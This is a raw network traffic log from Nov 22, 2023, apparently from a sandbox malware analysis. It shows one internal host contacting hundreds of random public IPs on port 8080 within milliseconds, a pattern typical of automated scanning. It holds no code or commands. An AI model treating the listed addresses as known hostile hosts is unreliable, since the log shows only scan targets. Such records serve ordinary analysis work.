Nov 22, 2023 08:37:51.423114061 CET	54329	8080	192.168.2.23	62.195.245.182
Nov 22, 2023 08:37:51.423125982 CET	54329	8080	192.168.2.23	85.21.196.158
Nov 22, 2023 08:37:51.423125982 CET	54329	8080	192.168.2.23	62.6.129.224
Nov 22, 2023 08:37:51.423146009 CET	54329	8080	192.168.2.23	62.40.184.15
Nov 22, 2023 08:37:51.423152924 CET	54329	8080	192.168.2.23	94.161.158.60
Nov 22, 2023 08:37:51.423154116 CET	54329	8080	192.168.2.23	31.116.77.185
Nov 22, 2023 08:37:51.423155069 CET	54329	8080	192.168.2.23	94.78.199.27
Nov 22, 2023 08:37:51.423154116 CET	54329	8080	192.168.2.23	95.18.223.153
Nov 22, 2023 08:37:51.423163891 CET	54329	8080	192.168.2.23	31.106.101.7
Nov 22, 2023 08:37:51.423165083 CET	54329	8080	192.168.2.23	31.37.140.217
Nov 22, 2023 08:37:51.423192024 CET	54329	8080	192.168.2.23	62.135.105.41
Nov 22, 2023 08:37:51.423192978 CET	54329	8080	192.168.2.23	85.109.247.246
Nov 22, 2023 08:37:51.423202991 CET	54329	8080	192.168.2.23	85.112.33.153
Nov 22, 2023 08:37:51.423202991 CET	54329	8080	192.168.2.23	62.54.7.31
Nov 22, 2023 08:37:51.423203945 CET	54329	8080	192.168.2.23	62.124.188.107
Nov 22, 2023 08:37:51.423203945 CET	54329	8080	192.168.2.23	31.176.136.204
Nov 22, 2023 08:37:51.423209906 CET	54329	8080	192.168.2.23	85.178.97.234
Nov 22, 2023 08:37:51.423209906 CET	54329	8080	192.168.2.23	95.122.212.142
Nov 22, 2023 08:37:51.423209906 CET	54329	8080	192.168.2.23	85.124.4.61
Nov 22, 2023 08:37:51.423213005 CET	54329	8080	192.168.2.23	85.10.214.169
Nov 22, 2023 08:37:51.423209906 CET	54329	8080	192.168.2.23	31.84.192.31
Nov 22, 2023 08:37:51.423216105 CET	54329	8080	192.168.2.23	85.132.175.172
Nov 22, 2023 08:37:51.423233032 CET	54329	8080	192.168.2.23	31.243.223.128
Nov 22, 2023 08:37:51.423234940 CET	54329	8080	192.168.2.23	62.15.147.56
Nov 22, 2023 08:37:51.423238993 CET	54329	8080	192.168.2.23	95.19.49.135
Nov 22, 2023 08:37:51.423240900 CET	54329	8080	192.168.2.23	31.18.97.169
Nov 22, 2023 08:37:51.423240900 CET	54329	8080	192.168.2.23	94.240.109.9
Nov 22, 2023 08:37:51.423249006 CET	54329	8080	192.168.2.23	31.227.199.21
Nov 22, 2023 08:37:51.423253059 CET	54329	8080	192.168.2.23	62.139.17.1
Nov 22, 2023 08:37:51.423254967 CET	54329	8080	192.168.2.23	31.232.65.96
Nov 22, 2023 08:37:51.423259974 CET	54329	8080	192.168.2.23	85.210.135.121
Nov 22, 2023 08:37:51.423278093 CET	54329	8080	192.168.2.23	62.221.12.57
Nov 22, 2023 08:37:51.423283100 CET	54329	8080	192.168.2.23	62.126.69.175
Nov 22, 2023 08:37:51.423285961 CET	54329	8080	192.168.2.23	95.149.183.184
Nov 22, 2023 08:37:51.423289061 CET	54329	8080	192.168.2.23	31.137.71.168
Nov 22, 2023 08:37:51.423299074 CET	54329	8080	192.168.2.23	94.149.226.94
Nov 22, 2023 08:37:51.423310041 CET	54329	8080	192.168.2.23	62.106.11.3
Nov 22, 2023 08:37:51.423311949 CET	54329	8080	192.168.2.23	62.97.86.198
Nov 22, 2023 08:37:51.423311949 CET	54329	8080	192.168.2.23	62.51.105.215
Nov 22, 2023 08:37:51.423316956 CET	54329	8080	192.168.2.23	94.192.144.169
Nov 22, 2023 08:37:51.423319101 CET	54329	8080	192.168.2.23	94.201.3.31
Nov 22, 2023 08:37:51.423321962 CET	54329	8080	192.168.2.23	94.149.23.198
Nov 22, 2023 08:37:51.423322916 CET	54329	8080	192.168.2.23	85.79.118.215
Nov 22, 2023 08:37:51.423326015 CET	54329	8080	192.168.2.23	31.233.170.132
Nov 22, 2023 08:37:51.423335075 CET	54329	8080	192.168.2.23	95.83.151.158
Nov 22, 2023 08:37:51.423336029 CET	54329	8080	192.168.2.23	94.200.52.73
Nov 22, 2023 08:37:51.423350096 CET	54329	8080	192.168.2.23	85.1.192.239
Nov 22, 2023 08:37:51.423351049 CET	54329	8080	192.168.2.23	62.111.124.159
Nov 22, 2023 08:37:51.423355103 CET	54329	8080	192.168.2.23	62.137.75.228
Nov 22, 2023 08:37:51.423367977 CET	54329	8080	192.168.2.23	94.70.147.8
Nov 22, 2023 08:37:51.423374891 CET	54329	8080	192.168.2.23	94.22.127.238
Nov 22, 2023 08:37:51.423374891 CET	54329	8080	192.168.2.23	62.139.13.113
Nov 22, 2023 08:37:51.423377991 CET	54329	8080	192.168.2.23	31.115.188.22
Nov 22, 2023 08:37:51.423377991 CET	54329	8080	192.168.2.23	62.140.179.84
Nov 22, 2023 08:37:51.423388958 CET	54329	8080	192.168.2.23	94.210.67.154
Nov 22, 2023 08:37:51.423403978 CET	54329	8080	192.168.2.23	62.89.206.94
Nov 22, 2023 08:37:51.423405886 CET	54329	8080	192.168.2.23	31.67.143.13
Nov 22, 2023 08:37:51.423413992 CET	54329	8080	192.168.2.23	85.34.18.158
Nov 22, 2023 08:37:51.423413992 CET	54329	8080	192.168.2.23	85.193.177.109
Nov 22, 2023 08:37:51.423413992 CET	54329	8080	192.168.2.23	31.107.235.55
Nov 22, 2023 08:37:51.423432112 CET	54329	8080	192.168.2.23	94.254.170.32
Nov 22, 2023 08:37:51.423434019 CET	54329	8080	192.168.2.23	62.21.150.54
Nov 22, 2023 08:37:51.423439980 CET	54329	8080	192.168.2.23	94.157.99.93
Nov 22, 2023 08:37:51.423444033 CET	54329	8080	192.168.2.23	95.103.118.154
Nov 22, 2023 08:37:51.423461914 CET	54329	8080	192.168.2.23	85.103.194.219
Nov 22, 2023 08:37:51.423469067 CET	54329	8080	192.168.2.23	94.201.199.32
Nov 22, 2023 08:37:51.423469067 CET	54329	8080	192.168.2.23	94.34.85.183
Nov 22, 2023 08:37:51.423476934 CET	54329	8080	192.168.2.23	62.60.179.251
Nov 22, 2023 08:37:51.423492908 CET	54329	8080	192.168.2.23	31.20.203.152
Nov 22, 2023 08:37:51.423494101 CET	54329	8080	192.168.2.23	85.169.48.249
Nov 22, 2023 08:37:51.423496962 CET	54329	8080	192.168.2.23	31.44.178.75
Nov 22, 2023 08:37:51.423502922 CET	54329	8080	192.168.2.23	31.13.102.0
Nov 22, 2023 08:37:51.423502922 CET	54329	8080	192.168.2.23	31.86.67.94
Nov 22, 2023 08:37:51.423502922 CET	54329	8080	192.168.2.23	31.78.77.134
Nov 22, 2023 08:37:51.423517942 CET	54329	8080	192.168.2.23	62.160.235.63
Nov 22, 2023 08:37:51.423520088 CET	54329	8080	192.168.2.23	94.221.109.40
Nov 22, 2023 08:37:51.423522949 CET	54329	8080	192.168.2.23	94.30.73.251
Nov 22, 2023 08:37:51.423523903 CET	54329	8080	192.168.2.23	85.25.0.169
Nov 22, 2023 08:37:51.423532009 CET	54329	8080	192.168.2.23	31.29.221.215
Nov 22, 2023 08:37:51.423532963 CET	54329	8080	192.168.2.23	62.137.63.109
Nov 22, 2023 08:37:51.423542023 CET	54329	8080	192.168.2.23	94.165.87.23
Nov 22, 2023 08:37:51.423551083 CET	54329	8080	192.168.2.23	85.231.209.169
Nov 22, 2023 08:37:51.423552990 CET	54329	8080	192.168.2.23	94.205.4.116
Nov 22, 2023 08:37:51.423552036 CET	54329	8080	192.168.2.23	31.218.74.175
Nov 22, 2023 08:37:51.423552036 CET	54329	8080	192.168.2.23	85.169.91.183
Nov 22, 2023 08:37:51.423572063 CET	54329	8080	192.168.2.23	85.44.156.88
Nov 22, 2023 08:37:51.423583031 CET	54329	8080	192.168.2.23	85.152.84.148
Nov 22, 2023 08:37:51.423583984 CET	54329	8080	192.168.2.23	94.3.204.226
Nov 22, 2023 08:37:51.423584938 CET	54329	8080	192.168.2.23	94.136.185.75
Nov 22, 2023 08:37:51.423584938 CET	54329	8080	192.168.2.23	95.11.177.241
Nov 22, 2023 08:37:51.423597097 CET	54329	8080	192.168.2.23	85.243.178.190
Nov 22, 2023 08:37:51.423599958 CET	54329	8080	192.168.2.23	94.202.51.211
Nov 22, 2023 08:37:51.423599958 CET	54329	8080	192.168.2.23	31.88.218.192
Nov 22, 2023 08:37:51.423603058 CET	54329	8080	192.168.2.23	85.196.38.68
Nov 22, 2023 08:37:51.423603058 CET	54329	8080	192.168.2.23	85.112.192.54
Nov 22, 2023 08:37:51.423604965 CET	54329	8080	192.168.2.23	95.202.145.36
Nov 22, 2023 08:37:51.423631907 CET	54329	8080	192.168.2.23	94.6.86.199
Nov 22, 2023 08:37:51.423634052 CET	54329	8080	192.168.2.23	94.183.21.216
Nov 22, 2023 08:37:51.423669100 CET	54329	8080	192.168.2.23	94.152.185.78
Nov 22, 2023 08:37:51.423671961 CET	54329	8080	192.168.2.23	85.183.245.63
Nov 22, 2023 08:37:51.423671961 CET	54329	8080	192.168.2.23	95.33.179.61
Nov 22, 2023 08:37:51.423671961 CET	54329	8080	192.168.2.23	31.18.137.29
Nov 22, 2023 08:37:51.423672915 CET	54329	8080	192.168.2.23	31.103.185.102
Nov 22, 2023 08:37:51.423676968 CET	54329	8080	192.168.2.23	31.85.11.228
Nov 22, 2023 08:37:51.423676968 CET	54329	8080	192.168.2.23	62.185.128.239
Nov 22, 2023 08:37:51.423679113 CET	54329	8080	192.168.2.23	62.181.106.189
Nov 22, 2023 08:37:51.423698902 CET	54329	8080	192.168.2.23	95.51.252.150
Nov 22, 2023 08:37:51.423706055 CET	54329	8080	192.168.2.23	95.50.136.116
Nov 22, 2023 08:37:51.423706055 CET	54329	8080	192.168.2.23	62.189.105.240
Nov 22, 2023 08:37:51.423715115 CET	54329	8080	192.168.2.23	94.148.118.227
Nov 22, 2023 08:37:51.423717022 CET	54329	8080	192.168.2.23	31.214.184.91
Nov 22, 2023 08:37:51.423719883 CET	54329	8080	192.168.2.23	31.39.142.53
Nov 22, 2023 08:37:51.423743963 CET	54329	8080	192.168.2.23	31.156.116.173
Nov 22, 2023 08:37:51.423758030 CET	54329	8080	192.168.2.23	62.148.99.211
Nov 22, 2023 08:37:51.423758030 CET	54329	8080	192.168.2.23	62.44.246.212
Nov 22, 2023 08:37:51.423763037 CET	54329	8080	192.168.2.23	85.15.97.37
Nov 22, 2023 08:37:51.423763037 CET	54329	8080	192.168.2.23	62.120.5.98
Nov 22, 2023 08:37:51.423767090 CET	54329	8080	192.168.2.23	95.131.181.197
Nov 22, 2023 08:37:51.423772097 CET	54329	8080	192.168.2.23	95.23.147.32
Nov 22, 2023 08:37:51.423774004 CET	54329	8080	192.168.2.23	62.48.2.186
Nov 22, 2023 08:37:51.423784018 CET	54329	8080	192.168.2.23	95.170.34.173
Nov 22, 2023 08:37:51.423788071 CET	54329	8080	192.168.2.23	62.158.114.248
Nov 22, 2023 08:37:51.423788071 CET	54329	8080	192.168.2.23	62.95.127.254
Nov 22, 2023 08:37:51.423788071 CET	54329	8080	192.168.2.23	95.81.48.125
Nov 22, 2023 08:37:51.423803091 CET	54329	8080	192.168.2.23	95.175.13.79
Nov 22, 2023 08:37:51.423804998 CET	54329	8080	192.168.2.23	94.237.30.84
Nov 22, 2023 08:37:51.423804998 CET	54329	8080	192.168.2.23	31.28.235.29
Nov 22, 2023 08:37:51.423804998 CET	54329	8080	192.168.2.23	31.187.38.30
Nov 22, 2023 08:37:51.423830032 CET	54329	8080	192.168.2.23	62.195.205.146
Nov 22, 2023 08:37:51.423832893 CET	54329	8080	192.168.2.23	94.93.171.195
Nov 22, 2023 08:37:51.423832893 CET	54329	8080	192.168.2.23	62.202.207.0
Nov 22, 2023 08:37:51.423836946 CET	54329	8080	192.168.2.23	95.151.153.202
Nov 22, 2023 08:37:51.423847914 CET	54329	8080	192.168.2.23	31.157.52.136
Nov 22, 2023 08:37:51.423860073 CET	54329	8080	192.168.2.23	31.230.163.108
Nov 22, 2023 08:37:51.423860073 CET	54329	8080	192.168.2.23	94.199.29.65
Nov 22, 2023 08:37:51.423867941 CET	54329	8080	192.168.2.23	31.134.127.158
Nov 22, 2023 08:37:51.423882008 CET	54329	8080	192.168.2.23	95.249.230.35
Nov 22, 2023 08:37:51.423892021 CET	54329	8080	192.168.2.23	95.218.130.20
Nov 22, 2023 08:37:51.423892021 CET	54329	8080	192.168.2.23	31.77.245.182
Nov 22, 2023 08:37:51.423892021 CET	54329	8080	192.168.2.23	85.99.159.57
Nov 22, 2023 08:37:51.423897982 CET	54329	8080	192.168.2.23	31.125.13.147
Nov 22, 2023 08:37:51.423897982 CET	54329	8080	192.168.2.23	95.141.227.146
Nov 22, 2023 08:37:51.423902035 CET	54329	8080	192.168.2.23	95.7.121.126
Nov 22, 2023 08:37:51.423906088 CET	54329	8080	192.168.2.23	94.245.248.147
Nov 22, 2023 08:37:51.423907995 CET	54329	8080	192.168.2.23	31.155.116.165
Nov 22, 2023 08:37:51.423909903 CET	54329	8080	192.168.2.23	95.35.197.117
Nov 22, 2023 08:37:51.423912048 CET	54329	8080	192.168.2.23	31.18.126.45
Nov 22, 2023 08:37:51.423913002 CET	54329	8080	192.168.2.23	95.49.112.62
Nov 22, 2023 08:37:51.423940897 CET	54329	8080	192.168.2.23	95.77.16.60
Nov 22, 2023 08:37:51.423939943 CET	54329	8080	192.168.2.23	31.209.201.109
Nov 22, 2023 08:37:51.423939943 CET	54329	8080	192.168.2.23	31.142.2.75
Nov 22, 2023 08:37:51.423953056 CET	54329	8080	192.168.2.23	94.160.43.174
Nov 22, 2023 08:37:51.423955917 CET	54329	8080	192.168.2.23	85.129.239.187
Nov 22, 2023 08:37:51.423968077 CET	54329	8080	192.168.2.23	95.23.39.175
Nov 22, 2023 08:37:51.423971891 CET	54329	8080	192.168.2.23	95.57.39.27
Nov 22, 2023 08:37:51.423986912 CET	54329	8080	192.168.2.23	94.106.221.30
Nov 22, 2023 08:37:51.423991919 CET	54329	8080	192.168.2.23	62.37.53.224
Nov 22, 2023 08:37:51.424000025 CET	54329	8080	192.168.2.23	62.168.121.8
Nov 22, 2023 08:37:51.424000025 CET	54329	8080	192.168.2.23	94.208.71.70
Nov 22, 2023 08:37:51.424000025 CET	54329	8080	192.168.2.23	94.250.138.176
Nov 22, 2023 08:37:51.424014091 CET	54329	8080	192.168.2.23	31.126.170.210
Nov 22, 2023 08:37:51.424015045 CET	54329	8080	192.168.2.23	31.114.153.153
Nov 22, 2023 08:37:51.424029112 CET	54329	8080	192.168.2.23	62.46.202.83
Nov 22, 2023 08:37:51.424037933 CET	54329	8080	192.168.2.23	31.38.187.200
Nov 22, 2023 08:37:51.424042940 CET	54329	8080	192.168.2.23	94.27.64.138
Nov 22, 2023 08:37:51.424055099 CET	54329	8080	192.168.2.23	94.166.103.217
Nov 22, 2023 08:37:51.424057007 CET	54329	8080	192.168.2.23	95.100.85.202
Nov 22, 2023 08:37:51.424062014 CET	54329	8080	192.168.2.23	62.143.189.160
Nov 22, 2023 08:37:51.424062014 CET	54329	8080	192.168.2.23	95.48.140.50
Nov 22, 2023 08:37:51.424062967 CET	54329	8080	192.168.2.23	85.68.195.77
Nov 22, 2023 08:37:51.424071074 CET	54329	8080	192.168.2.23	85.128.229.226
Nov 22, 2023 08:37:51.424082041 CET	54329	8080	192.168.2.23	95.123.185.211
Nov 22, 2023 08:37:51.424092054 CET	54329	8080	192.168.2.23	31.248.200.246
Nov 22, 2023 08:37:51.424098969 CET	54329	8080	192.168.2.23	85.187.192.226
Nov 22, 2023 08:37:51.424103022 CET	54329	8080	192.168.2.23	94.66.118.116
Nov 22, 2023 08:37:51.424103022 CET	54329	8080	192.168.2.23	62.178.41.73
Nov 22, 2023 08:37:51.424103022 CET	54329	8080	192.168.2.23	62.15.31.82
Nov 22, 2023 08:37:51.424113035 CET	54329	8080	192.168.2.23	94.198.147.215
Nov 22, 2023 08:37:51.424122095 CET	54329	8080	192.168.2.23	62.183.233.188
Nov 22, 2023 08:37:51.424138069 CET	54329	8080	192.168.2.23	95.21.54.124
Nov 22, 2023 08:37:51.424141884 CET	54329	8080	192.168.2.23	31.246.135.139
Nov 22, 2023 08:37:51.424145937 CET	54329	8080	192.168.2.23	94.55.242.101
Nov 22, 2023 08:37:51.424148083 CET	54329	8080	192.168.2.23	95.100.192.122
Nov 22, 2023 08:37:51.424163103 CET	54329	8080	192.168.2.23	94.201.75.57
Nov 22, 2023 08:37:51.424175024 CET	54329	8080	192.168.2.23	62.227.95.116
Nov 22, 2023 08:37:51.424180031 CET	54329	8080	192.168.2.23	95.178.105.69
Nov 22, 2023 08:37:51.424182892 CET	54329	8080	192.168.2.23	62.17.139.148
Nov 22, 2023 08:37:51.424182892 CET	54329	8080	192.168.2.23	62.56.202.66
Nov 22, 2023 08:37:51.424182892 CET	54329	8080	192.168.2.23	31.191.51.169
Nov 22, 2023 08:37:51.424197912 CET	54329	8080	192.168.2.23	95.59.19.69
Nov 22, 2023 08:37:51.424199104 CET	54329	8080	192.168.2.23	85.164.62.112
Nov 22, 2023 08:37:51.424197912 CET	54329	8080	192.168.2.23	94.87.29.217
Nov 22, 2023 08:37:51.424209118 CET	54329	8080	192.168.2.23	95.111.198.173
Nov 22, 2023 08:37:51.424212933 CET	54329	8080	192.168.2.23	62.246.193.112
Nov 22, 2023 08:37:51.424220085 CET	54329	8080	192.168.2.23	85.77.95.223
Nov 22, 2023 08:37:51.424231052 CET	54329	8080	192.168.2.23	94.184.144.185
Nov 22, 2023 08:37:51.424231052 CET	54329	8080	192.168.2.23	95.145.141.5
Nov 22, 2023 08:37:51.424243927 CET	54329	8080	192.168.2.23	62.212.134.22
Nov 22, 2023 08:37:51.424252033 CET	54329	8080	192.168.2.23	94.246.0.61
Nov 22, 2023 08:37:51.424262047 CET	54329	8080	192.168.2.23	95.181.58.58
Nov 22, 2023 08:37:51.424263000 CET	54329	8080	192.168.2.23	31.175.116.126
Nov 22, 2023 08:37:51.424266100 CET	54329	8080	192.168.2.23	85.234.171.154
Nov 22, 2023 08:37:51.424266100 CET	54329	8080	192.168.2.23	94.84.219.63
Nov 22, 2023 08:37:51.424267054 CET	54329	8080	192.168.2.23	31.226.30.252
Nov 22, 2023 08:37:51.424273968 CET	54329	8080	192.168.2.23	62.84.243.176
Nov 22, 2023 08:37:51.424276114 CET	54329	8080	192.168.2.23	94.55.124.103
Nov 22, 2023 08:37:51.424282074 CET	54329	8080	192.168.2.23	94.21.139.166
Nov 22, 2023 08:37:51.424287081 CET	54329	8080	192.168.2.23	31.48.135.15
Nov 22, 2023 08:37:51.424309015 CET	54329	8080	192.168.2.23	95.145.234.198
Nov 22, 2023 08:37:51.424314022 CET	54329	8080	192.168.2.23	31.174.171.79
Nov 22, 2023 08:37:51.424319029 CET	54329	8080	192.168.2.23	31.111.169.117
Nov 22, 2023 08:37:51.424319029 CET	54329	8080	192.168.2.23	94.125.159.223
Nov 22, 2023 08:37:51.424329996 CET	54329	8080	192.168.2.23	31.229.251.219
Nov 22, 2023 08:37:51.424329996 CET	54329	8080	192.168.2.23	95.109.52.227
Nov 22, 2023 08:37:51.424335957 CET	54329	8080	192.168.2.23	62.182.197.144
Nov 22, 2023 08:37:51.424340010 CET	54329	8080	192.168.2.23	95.100.134.147
Nov 22, 2023 08:37:51.424340010 CET	54329	8080	192.168.2.23	31.197.1.165
Nov 22, 2023 08:37:51.424348116 CET	54329	8080	192.168.2.23	62.217.84.149
Nov 22, 2023 08:37:51.424357891 CET	54329	8080	192.168.2.23	95.233.199.42
Nov 22, 2023 08:37:51.424369097 CET	54329	8080	192.168.2.23	85.98.241.183
Nov 22, 2023 08:37:51.424371004 CET	54329	8080	192.168.2.23	62.197.191.112
Nov 22, 2023 08:37:51.424374104 CET	54329	8080	192.168.2.23	85.243.89.243
Nov 22, 2023 08:37:51.424387932 CET	54329	8080	192.168.2.23	94.251.236.71
Nov 22, 2023 08:37:51.424387932 CET	54329	8080	192.168.2.23	95.183.114.193
Nov 22, 2023 08:37:51.424396992 CET	54329	8080	192.168.2.23	62.133.172.88
Nov 22, 2023 08:37:51.424412966 CET	54329	8080	192.168.2.23	31.188.162.194
Nov 22, 2023 08:37:51.424413919 CET	54329	8080	192.168.2.23	85.188.81.142
Nov 22, 2023 08:37:51.424424887 CET	54329	8080	192.168.2.23	94.183.213.76
Nov 22, 2023 08:37:51.424429893 CET	54329	8080	192.168.2.23	95.179.215.235
Nov 22, 2023 08:37:51.424432993 CET	54329	8080	192.168.2.23	94.68.125.141
Nov 22, 2023 08:37:51.424432993 CET	54329	8080	192.168.2.23	95.11.47.39
Nov 22, 2023 08:37:51.424439907 CET	54329	8080	192.168.2.23	31.55.170.101
Nov 22, 2023 08:37:51.424455881 CET	54329	8080	192.168.2.23	95.222.89.132
Nov 22, 2023 08:37:51.424458027 CET	54329	8080	192.168.2.23	31.6.115.74
Nov 22, 2023 08:37:51.424468040 CET	54329	8080	192.168.2.23	85.76.217.77
Nov 22, 2023 08:37:51.424469948 CET	54329	8080	192.168.2.23	94.33.214.185
Nov 22, 2023 08:37:51.424479008 CET	54329	8080	192.168.2.23	62.84.60.6
Nov 22, 2023 08:37:51.424479008 CET	54329	8080	192.168.2.23	94.154.92.110
Nov 22, 2023 08:37:51.424490929 CET	54329	8080	192.168.2.23	95.145.51.0
Nov 22, 2023 08:37:51.424493074 CET	54329	8080	192.168.2.23	85.36.146.50
Nov 22, 2023 08:37:51.424494982 CET	54329	8080	192.168.2.23	94.104.101.141
Nov 22, 2023 08:37:51.424505949 CET	54329	8080	192.168.2.23	95.11.10.151
Nov 22, 2023 08:37:51.424515009 CET	54329	8080	192.168.2.23	85.72.10.24
Nov 22, 2023 08:37:51.424515009 CET	54329	8080	192.168.2.23	62.240.217.194
Nov 22, 2023 08:37:51.424519062 CET	54329	8080	192.168.2.23	62.135.87.141
Nov 22, 2023 08:37:51.424523115 CET	54329	8080	192.168.2.23	85.35.32.137
Nov 22, 2023 08:37:51.424526930 CET	54329	8080	192.168.2.23	62.128.207.82
Nov 22, 2023 08:37:51.424545050 CET	54329	8080	192.168.2.23	31.51.177.116
Nov 22, 2023 08:37:51.424547911 CET	54329	8080	192.168.2.23	94.134.61.130
Nov 22, 2023 08:37:51.424547911 CET	54329	8080	192.168.2.23	94.211.132.104
Nov 22, 2023 08:37:51.424560070 CET	54329	8080	192.168.2.23	62.22.239.171
Nov 22, 2023 08:37:51.424561977 CET	54329	8080	192.168.2.23	62.48.100.189
Nov 22, 2023 08:37:51.424572945 CET	54329	8080	192.168.2.23	95.49.87.237
Nov 22, 2023 08:37:51.424582958 CET	54329	8080	192.168.2.23	62.52.244.48
Nov 22, 2023 08:37:51.424587965 CET	54329	8080	192.168.2.23	62.139.140.85
Nov 22, 2023 08:37:51.424592018 CET	54329	8080	192.168.2.23	95.153.62.103
Nov 22, 2023 08:37:51.424603939 CET	54329	8080	192.168.2.23	31.46.171.68
Nov 22, 2023 08:37:51.424607992 CET	54329	8080	192.168.2.23	94.170.191.80
Nov 22, 2023 08:37:51.424612045 CET	54329	8080	192.168.2.23	95.13.84.250
Nov 22, 2023 08:37:51.424628019 CET	54329	8080	192.168.2.23	31.190.54.78
Nov 22, 2023 08:37:51.424628019 CET	54329	8080	192.168.2.23	94.243.103.228
Nov 22, 2023 08:37:51.424638033 CET	54329	8080	192.168.2.23	62.80.238.99
Nov 22, 2023 08:37:51.424647093 CET	54329	8080	192.168.2.23	94.109.55.155
Nov 22, 2023 08:37:51.424647093 CET	54329	8080	192.168.2.23	95.224.22.188
Nov 22, 2023 08:37:51.424654007 CET	54329	8080	192.168.2.23	62.43.211.101
Nov 22, 2023 08:37:51.424674034 CET	54329	8080	192.168.2.23	62.149.171.66
Nov 22, 2023 08:37:51.424676895 CET	54329	8080	192.168.2.23	95.45.84.120
Nov 22, 2023 08:37:51.424676895 CET	54329	8080	192.168.2.23	31.100.250.184
Nov 22, 2023 08:37:51.424679995 CET	54329	8080	192.168.2.23	95.169.86.146
Nov 22, 2023 08:37:51.424679995 CET	54329	8080	192.168.2.23	31.127.95.241
Nov 22, 2023 08:37:51.424693108 CET	54329	8080	192.168.2.23	85.158.194.52
Nov 22, 2023 08:37:51.424699068 CET	54329	8080	192.168.2.23	31.145.54.243
Nov 22, 2023 08:37:51.424712896 CET	54329	8080	192.168.2.23	95.235.95.194
Nov 22, 2023 08:37:51.424712896 CET	54329	8080	192.168.2.23	31.32.120.115
Nov 22, 2023 08:37:51.424712896 CET	54329	8080	192.168.2.23	95.91.32.107
Nov 22, 2023 08:37:51.424724102 CET	54329	8080	192.168.2.23	95.219.18.117
Nov 22, 2023 08:37:51.424724102 CET	54329	8080	192.168.2.23	31.197.55.131
Nov 22, 2023 08:37:51.424732924 CET	54329	8080	192.168.2.23	31.11.68.18
Nov 22, 2023 08:37:51.424737930 CET	54329	8080	192.168.2.23	95.222.115.163
Nov 22, 2023 08:37:51.424740076 CET	54329	8080	192.168.2.23	85.49.201.20
Nov 22, 2023 08:37:51.424747944 CET	54329	8080	192.168.2.23	62.238.62.239
Nov 22, 2023 08:37:51.424762964 CET	54329	8080	192.168.2.23	85.53.69.60
Nov 22, 2023 08:37:51.424767971 CET	54329	8080	192.168.2.23	85.220.188.52
Nov 22, 2023 08:37:51.424768925 CET	54329	8080	192.168.2.23	62.116.7.133
Nov 22, 2023 08:37:51.424768925 CET	54329	8080	192.168.2.23	94.189.241.113
Nov 22, 2023 08:37:51.424777031 CET	54329	8080	192.168.2.23	31.101.180.212
Nov 22, 2023 08:37:51.424783945 CET	54329	8080	192.168.2.23	94.20.219.231
Nov 22, 2023 08:37:51.424784899 CET	54329	8080	192.168.2.23	85.91.223.129
Nov 22, 2023 08:37:51.424794912 CET	54329	8080	192.168.2.23	85.32.214.33
Nov 22, 2023 08:37:51.424799919 CET	54329	8080	192.168.2.23	31.194.80.166
Nov 22, 2023 08:37:51.424808025 CET	54329	8080	192.168.2.23	31.254.125.36
Nov 22, 2023 08:37:51.424819946 CET	54329	8080	192.168.2.23	94.197.236.62
Nov 22, 2023 08:37:51.424822092 CET	54329	8080	192.168.2.23	85.78.35.42
Nov 22, 2023 08:37:51.424832106 CET	54329	8080	192.168.2.23	62.174.14.202
Nov 22, 2023 08:37:51.424839020 CET	54329	8080	192.168.2.23	85.217.95.141
Nov 22, 2023 08:37:51.424839020 CET	54329	8080	192.168.2.23	62.106.106.72
Nov 22, 2023 08:37:51.424841881 CET	54329	8080	192.168.2.23	94.27.49.106
Nov 22, 2023 08:37:51.424851894 CET	54329	8080	192.168.2.23	94.167.112.28
Nov 22, 2023 08:37:51.424858093 CET	54329	8080	192.168.2.23	62.48.50.138
Nov 22, 2023 08:37:51.424860954 CET	54329	8080	192.168.2.23	85.228.208.80
Nov 22, 2023 08:37:51.424874067 CET	54329	8080	192.168.2.23	85.89.167.13
Nov 22, 2023 08:37:51.424874067 CET	54329	8080	192.168.2.23	94.248.114.53
Nov 22, 2023 08:37:51.424881935 CET	54329	8080	192.168.2.23	31.66.101.240
Nov 22, 2023 08:37:51.424886942 CET	54329	8080	192.168.2.23	31.46.111.102
Nov 22, 2023 08:37:51.424886942 CET	54329	8080	192.168.2.23	31.61.108.180
Nov 22, 2023 08:37:51.424891949 CET	54329	8080	192.168.2.23	62.177.149.86
Nov 22, 2023 08:37:51.424891949 CET	54329	8080	192.168.2.23	94.187.150.13
Nov 22, 2023 08:37:51.424892902 CET	54329	8080	192.168.2.23	94.168.234.7
Nov 22, 2023 08:37:51.424915075 CET	54329	8080	192.168.2.23	62.207.41.196
Nov 22, 2023 08:37:51.424915075 CET	54329	8080	192.168.2.23	94.60.47.11
Nov 22, 2023 08:37:51.424916983 CET	54329	8080	192.168.2.23	62.171.145.251
Nov 22, 2023 08:37:51.424921036 CET	54329	8080	192.168.2.23	31.92.140.145
Nov 22, 2023 08:37:51.424932003 CET	54329	8080	192.168.2.23	62.204.147.129
Nov 22, 2023 08:37:51.424933910 CET	54329	8080	192.168.2.23	95.244.226.26
Nov 22, 2023 08:37:51.424940109 CET	54329	8080	192.168.2.23	95.220.188.246
Nov 22, 2023 08:37:51.424941063 CET	54329	8080	192.168.2.23	94.169.52.250
Nov 22, 2023 08:37:51.424942970 CET	54329	8080	192.168.2.23	31.233.22.157
Nov 22, 2023 08:37:51.424961090 CET	54329	8080	192.168.2.23	94.57.19.215
Nov 22, 2023 08:37:51.424963951 CET	54329	8080	192.168.2.23	95.54.75.66
Nov 22, 2023 08:37:51.424974918 CET	54329	8080	192.168.2.23	85.178.42.50
Nov 22, 2023 08:37:51.424977064 CET	54329	8080	192.168.2.23	62.193.131.196
Nov 22, 2023 08:37:51.424984932 CET	54329	8080	192.168.2.23	62.103.202.154
Nov 22, 2023 08:37:51.424988985 CET	54329	8080	192.168.2.23	31.143.184.128
Nov 22, 2023 08:37:51.424994946 CET	54329	8080	192.168.2.23	62.31.182.212
Nov 22, 2023 08:37:51.424998999 CET	54329	8080	192.168.2.23	31.28.92.168
Nov 22, 2023 08:37:51.425015926 CET	54329	8080	192.168.2.23	62.185.47.117
Nov 22, 2023 08:37:51.425021887 CET	54329	8080	192.168.2.23	95.193.14.100
Nov 22, 2023 08:37:51.425036907 CET	54329	8080	192.168.2.23	85.179.75.81
Nov 22, 2023 08:37:51.425038099 CET	54329	8080	192.168.2.23	62.169.106.171
Nov 22, 2023 08:37:51.425038099 CET	54329	8080	192.168.2.23	85.146.228.52
Nov 22, 2023 08:37:51.425039053 CET	54329	8080	192.168.2.23	62.138.234.142
Nov 22, 2023 08:37:51.425040960 CET	54329	8080	192.168.2.23	85.60.175.66
Nov 22, 2023 08:37:51.425040960 CET	54329	8080	192.168.2.23	62.63.123.137
